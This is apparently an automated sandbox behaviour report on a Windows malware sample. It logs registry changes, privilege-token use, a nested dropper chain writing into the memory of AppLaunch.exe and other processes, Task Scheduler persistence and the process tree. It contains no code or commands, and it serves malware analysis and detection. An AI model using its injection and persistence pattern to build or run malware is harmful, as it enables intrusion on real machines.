Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2AC8.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1172 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe
PID 1172 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe
PID 1172 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe
PID 5056 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe
PID 5056 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe
PID 5056 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe
PID 3652 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe
PID 3652 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe
PID 3652 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe
PID 2204 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe
PID 2204 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe
PID 2204 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe
PID 2204 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe
PID 2204 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe
PID 2204 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe
PID 1280 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1280 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1280 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1280 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1280 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1280 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1280 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1280 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1280 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1280 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3652 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3hW12Bd.exe
PID 3652 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3hW12Bd.exe
PID 3652 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3hW12Bd.exe
PID 4116 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3hW12Bd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4116 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3hW12Bd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4116 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3hW12Bd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4116 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3hW12Bd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4116 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3hW12Bd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4116 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3hW12Bd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5056 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4yR691vd.exe
PID 5056 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4yR691vd.exe
PID 5056 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4yR691vd.exe
PID 3312 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4yR691vd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3312 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4yR691vd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3312 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4yR691vd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3312 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4yR691vd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3312 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4yR691vd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3312 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4yR691vd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3312 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4yR691vd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3312 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4yR691vd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1172 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5BZ2yc0.exe
PID 1172 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5BZ2yc0.exe
PID 1172 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5BZ2yc0.exe
PID 2084 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5BZ2yc0.exe C:\Windows\system32\cmd.exe
PID 2084 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5BZ2yc0.exe C:\Windows\system32\cmd.exe
PID 4100 wrote to memory of 4628 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4100 wrote to memory of 4628 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4100 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4100 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4628 wrote to memory of 1440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4628 wrote to memory of 1440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1656 wrote to memory of 4532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1656 wrote to memory of 4532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4628 wrote to memory of 2952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4628 wrote to memory of 2952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4628 wrote to memory of 2952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4628 wrote to memory of 2952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4628 wrote to memory of 2952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4628 wrote to memory of 2952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

